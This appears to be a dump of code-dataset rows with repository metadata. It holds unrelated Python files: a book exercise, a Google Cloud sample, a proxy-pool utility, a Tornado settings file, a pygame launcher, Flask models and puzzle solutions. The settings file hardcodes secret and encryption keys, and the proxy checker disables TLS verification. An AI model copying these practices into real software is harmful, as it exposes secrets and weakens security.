data=open('/Users/duheng/Documents/HeadFirstPython/chapter3/sketch.txt','r',encoding='utf-8')
for each_line in data:
try:
(role,line_spoken)=each_line.split(':',1)
line_spoken=line_spoken.strip()
if role=='Man':
man.append(line_spoken)
elif role=='Other Man':
other.append(line_spoken)
except ValueError:
pass
data.close()
except IOError:
print('The data file is missing!')
try:
man_file=open('man_data.txt','w')
other_file=open('other_data.txt','w')
print(man,file=man_file)
print(other,file=other_file)
man_file.close()
other_file.close()
except IOError:
print('File error.')
|
[
"emaildh@163.com"
] |
emaildh@163.com
|
0ec907252b0568f7621cb0e98415d6dc0de57206
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-channel/samples/generated_samples/cloudchannel_v1_generated_cloud_channel_service_provision_cloud_identity_async.py
|
294b8255ef654e0f099f9422b69dfee53a729aba
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 2,026
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ProvisionCloudIdentity
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-channel
# [START cloudchannel_v1_generated_CloudChannelService_ProvisionCloudIdentity_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import channel_v1
async def sample_provision_cloud_identity():
# Create a client
client = channel_v1.CloudChannelServiceAsyncClient()
# Initialize request argument(s)
request = channel_v1.ProvisionCloudIdentityRequest(
customer="customer_value",
)
# Make the request
operation = client.provision_cloud_identity(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
# [END cloudchannel_v1_generated_CloudChannelService_ProvisionCloudIdentity_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
64a7d6b3abb2ff86e6c68063872fb3310bc2f17e
|
0265e740dbc38ab543236a12d98ee9e0b57cb927
|
/crawler_world/proxy_pool/Util/utilFunction.py
|
2d8f46d84651dfe2e5f6940874d6370dc351f9c4
|
[
"MIT"
] |
permissive
|
ForeverDreamer/scrapy_learning
|
c5e604c6a285fa6fef112bdc5617b2129288477a
|
6d38c58af5b8ba87803ee77de61f2a54cc65a4db
|
refs/heads/master
| 2023-05-13T18:46:43.715685
| 2022-09-22T10:26:11
| 2022-09-22T10:26:11
| 179,958,600
| 0
| 0
| null | 2023-05-01T19:51:39
| 2019-04-07T11:48:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,154
|
py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
-------------------------------------------------
File Name: utilFunction.py
Description : tool function
Author : JHao
date: 2016/11/25
-------------------------------------------------
Change Activity:
2016/11/25: 添加robustCrawl、verifyProxy、getHtmlTree
-------------------------------------------------
"""
import requests
import time
from bs4 import BeautifulSoup
import re
from Util.LogHandler import LogHandler
from Util.WebRequest import WebRequest
# logger = LogHandler(__name__, stream=False)
def tcpConnect(proxy):
"""
TCP 三次握手
:param proxy:
:return:
"""
from socket import socket, AF_INET, SOCK_STREAM
s = socket(AF_INET, SOCK_STREAM)
ip, port = proxy.split(':')
result = s.connect_ex((ip, int(port)))
return True if result == 0 else False
# noinspection PyPep8Naming
def robustCrawl(func):
def decorate(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
pass
# logger.info(u"sorry, 抓取出错。错误原因:")
# logger.info(e)
return decorate
# noinspection PyPep8Naming
def verifyProxyFormat(proxy):
"""
检查代理格式
:param proxy:
:return:
"""
import re
verify_regex = r"https?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}"
_proxy = re.findall(verify_regex, proxy)
return True if len(_proxy) == 1 and _proxy[0] == proxy else False
# noinspection PyPep8Naming
def getHtmlTree(url, proxy_ip):
# TODO 取代理服务器用代理服务器访问
wr = WebRequest()
# delay 2s for per request
time.sleep(2)
# ip, port, prot = proxy_ip.split(':')
# proxies = {prot: '{}://{}:{}'.format(prot, ip, port)}
#
html = wr.get(url, proxies=None).text
return BeautifulSoup(html, features='lxml')
def extract_ip(ip_info):
ip = re.findall(r'\d+\.\d+\.\d+\.\d+', ip_info)
if len(ip) > 0:
ip = ip[0]
port = re.findall(r'(\d{4,5})<', ip_info)
if len(port) > 0:
port = port[0]
protocol = re.findall(r'https?|HTTPS?', ip_info)
if len(protocol) > 0:
protocol = protocol[0].lower()
else:
protocol = 'http'
return "{}:{}:{}".format(protocol, ip, port)
# noinspection PyPep8Naming
# def validUsefulProxy(proxy):
# url = "http://ip.tool.chinaz.com/" # 查自己的ip
# # url = "http://www.ip138.com/" # 查自己的ip
# ip, port, prot = proxy.split(':')
#
# try:
# proxies = {
# 'protocol': '{}://{}:{}'.format(prot, ip, port)
# }
# r = requests.get(url, proxies=proxies, timeout=10, verify=False)
# soup = BeautifulSoup(r.text, 'lxml')
#
# parent_node = soup.find(class_="IpMRig-tit")
#
# if ip == soup.find(class_="fz24").get_text():
# for i in parent_node.find_all('dd'):
# print(i.get_text())
#
# return True
# except Exception as e:
# print(e)
#
# return False
def validUsefulProxy(proxy):
url = "http://crawleruniverse.com:8000/ct/ri" # 查自己的ip
prot, ip, port = proxy.split(':')
try:
proxies = {
prot: '{}://{}:{}'.format(prot, ip, port)
}
r = requests.get(url, proxies=proxies, timeout=10, verify=False)
soup = BeautifulSoup(r.text, 'lxml')
http_x_forwarded_for = re.findall(r'\d+.\d+.\d+.\d+', str(soup.find("h4")))
remote_addr = re.findall(r'\d+.\d+.\d+.\d+', str(soup.find("h5")))[0]
if ip == remote_addr:
print('http_x_forwarded_for: {}, remote_addr: {}, ip: {}, pass: {}'.format(http_x_forwarded_for,
remote_addr,
ip,
ip == remote_addr))
return True
except Exception as e:
# pass
print(e)
return False
|
[
"499361328@qq.com"
] |
499361328@qq.com
|
69749573e1c7329b67e11083405f953765a7d54d
|
cd2ce8e913048a535d7680789d38a16f23ad04b3
|
/server/settings/local.py
|
bdfb750ad6a8b98893ae27a61c1b35837399a5c8
|
[] |
no_license
|
wade333777/cocos-js-tips
|
3758bbaccb168c1a7f4d17e243e8107cb9fbfb06
|
4f430d5631b1118ad251bdaf8384bc0dbdaf07b9
|
refs/heads/master
| 2021-01-20T20:35:48.273690
| 2016-06-22T10:02:15
| 2016-06-22T10:02:15
| 60,678,664
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,508
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from base import *
# 启用调试模式
DEBUG = True
# ============================================================================
CHANNEL = "android" # [只能小写]
WEB_KEY = 'spyykimech'
GAME_KEY = ')7yt4e!#)gcy&#0^hlme-+082=s!b!$8+h$+(j0bucx0+nu%pe'
ENCODE_DECODE_KEY = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
ENCODE_DECODE_IV = "1234567812345678"
# SECRET_KEY = ')7yt4e!#)gcy&#0^hlme-+082=s!b!$8+h$+(j0bucx0+nu%pe'
# ============================================================================
STATS_SWITCH = True
SCRIBE_SERVER = '127.0.0.1'
SCRIBE_PORT = 8250
# ============================================================================
LOGGER = {
'tornado': {
"OPEN": True,
"LEVEL": "INFO",
"HANDLERS": [
{
"module": "torngas.logger.CustomRotatingFileHandler",
"filename": "info",
"when": "W0",
"encoding": "utf-8",
"delay": True,
"backupCount": 100,
}
]
},
'torngas.accesslog': {
"OPEN": True,
"LEVEL": "INFO",
"FORMATTER": '%(message)s',
"HANDLERS": [
{
"module": "torngas.logger.CustomRotatingFileHandler",
"filename": "access",
"when": "W0",
"encoding": "utf-8",
"delay": False,
"backupCount": 100,
}
]
},
}
|
[
"1063776603@qq.com"
] |
1063776603@qq.com
|
5c37a9079020b9f7860ca0f1c0674ef4efac94d4
|
3d05a382e418234558bed720ad5a56dbbf976a6a
|
/game.py
|
3e0a01bab1c9d7a87849d46d9b85a0652467a729
|
[] |
no_license
|
richwandell/tank-tennis
|
79354963197ea8469ecd90a682f1d522e5fd7c13
|
47e822d21b6ad3e0330f6f2427da56bf0043a668
|
refs/heads/master
| 2020-04-02T14:24:14.956038
| 2018-10-24T15:19:57
| 2018-10-24T15:19:57
| 154,523,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
from modules.stage import Stage
from modules.main_menu import MainMenu
import json, pygame
pygame.init()
pygame.mixer.init()
screen, world = pygame.display.set_mode((0, 0),), {}
def showMenu():
global world, screen
world = MainMenu(screen)
def playLevel(level):
global world, screen
level1 = json.loads("".join(open("levels/level%s.json" % str(level)).readlines()))
world = Stage(screen, level1)
if __name__ == "__main__":
playLevel(1)
|
[
"richwandell@gmail.com"
] |
richwandell@gmail.com
|
69d4561868e7b4e9549331417be235f7bde6a826
|
45734abde30b437c2a1ba80653d7323e5c1d8c7f
|
/python/0735_asteroid_collision.py
|
c247bdeb01e2092efef3a66a280fd30416006c12
|
[] |
no_license
|
rdtr/leetcode_solutions
|
6629e03dd5b5fee15aaabe7f53204778f237ed96
|
51800d33c57e36ef62b6067d6f91a82c0e55dc6d
|
refs/heads/main
| 2022-05-21T12:17:23.201832
| 2022-03-12T09:20:46
| 2022-03-12T09:20:46
| 80,395,988
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 684
|
py
|
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
stack = []
i = 0
while i < len(asteroids):
if not stack:
stack.append(asteroids[i])
elif (asteroids[i] > 0 and stack[-1] > 0) or (asteroids[i] < 0 and stack[-1] < 0) or (
asteroids[i] > 0 and stack[-1] < 0):
stack.append(asteroids[i])
else:
size = -asteroids[i]
if size > stack[-1]:
stack.pop()
continue
elif size == stack[-1]:
stack.pop()
i += 1
return stack
|
[
"redtree.dev1112@gmail.com"
] |
redtree.dev1112@gmail.com
|
d6ffee8f77d0617d1af183ab560feda3653eec61
|
dc77f52db640fca23aa66be30f15378b09b205c1
|
/pitchblog/models.py
|
45de23c490eadfdabcd69a5f5c5b4b14e71aed09
|
[
"MIT"
] |
permissive
|
marysinaida/PITCH_SITE
|
233feb0401bc52c17d0f9e91a66c5f46829b1215
|
95d141baf92a24ce8273ca10b9ee64498d6f22dd
|
refs/heads/master
| 2020-09-15T22:57:14.343802
| 2019-11-26T13:25:36
| 2019-11-26T13:25:36
| 223,576,612
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 978
|
py
|
from datetime import datetime
from pitchblog import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(25), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
image_file = db.Column(db.String(20), nullable=False, default='default.jpg')
password = db.Column(db.String(60), nullable=False)
posts = db.relationship('Post', backref='author', lazy=True)
def __repr__(self):
return f("User{self.username} {self.email} {self.image_file}")
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
content = db.Column(db.Text, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
def __repr__(self):
return f("Post{self.title} {self.date_posted}")
|
[
"marydorcassinaida54@gmail.com"
] |
marydorcassinaida54@gmail.com
|
d50b30de4699270bdccde2ab4e9bc05670de33f4
|
4a8c1f7d9935609b780aff95c886ef7781967be0
|
/atcoder/_codeforces/1324_f.py
|
057771514859b798e0ba37f2a0eda18a50f48caf
|
[] |
no_license
|
recuraki/PythonJunkTest
|
d5e5f5957ac5dd0c539ef47759b1fe5ef7a2c52a
|
2556c973d468a6988d307ce85c5f2f8ab15e759a
|
refs/heads/master
| 2023-08-09T17:42:21.875768
| 2023-07-18T23:06:31
| 2023-07-18T23:06:31
| 13,790,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,066
|
py
|
import sys
from io import StringIO
import unittest
import logging
logging.basicConfig(level=logging.DEBUG)
def resolve():
n = int(input())
dat = list(map(int, input().split()))
v =[]
for i in range(n+1):
v.append([])
score = [0] * (n)
for i in range(n-1):
a, b = map(int, input().split())
v[a-1].append(b-1)
v[b-1].append(a-1)
for i in range(n):
for x in v[i]:
score[i] += 1
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_input_1(self):
print("test_input_1")
input = """9
0 1 1 1 0 0 0 0 1
1 2
1 3
3 4
3 5
2 6
4 7
6 8
5 9"""
output = """2 2 2 2 2 1 1 0 2 """
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main()
|
[
"glenda.kanai@gmail.com"
] |
glenda.kanai@gmail.com
|
a98077b547dbb92b9a08eedcba16e8d2d205d6c9
|
5312a19268af0f9ab2c319e46f8d460d64e6e898
|
/arche_m2m/__init__.py
|
55dbc9d8dab7729058fa4d83f25791c76e161c1c
|
[] |
no_license
|
GlobalActionPlan/arche_m2m
|
2b1bf57b89bb398d747966a5d094c40c6df66916
|
698381888ff55ec72f0027596c5afd9c9b6a3e78
|
refs/heads/master
| 2021-01-10T20:47:04.159490
| 2017-06-09T12:54:53
| 2017-06-09T12:54:53
| 23,307,596
| 1
| 0
| null | 2020-02-10T08:16:35
| 2014-08-25T08:49:12
|
Python
|
UTF-8
|
Python
| false
| false
| 335
|
py
|
from pyramid.i18n import TranslationStringFactory
_ = TranslationStringFactory('arche_m2m')
def includeme(config):
config.include('.ttw_translations')
config.include('.models')
config.include('.schemas')
config.include('.views')
config.include('.permissions')
config.add_translation_dirs('arche_m2m:locale')
|
[
"robin@betahaus.net"
] |
robin@betahaus.net
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.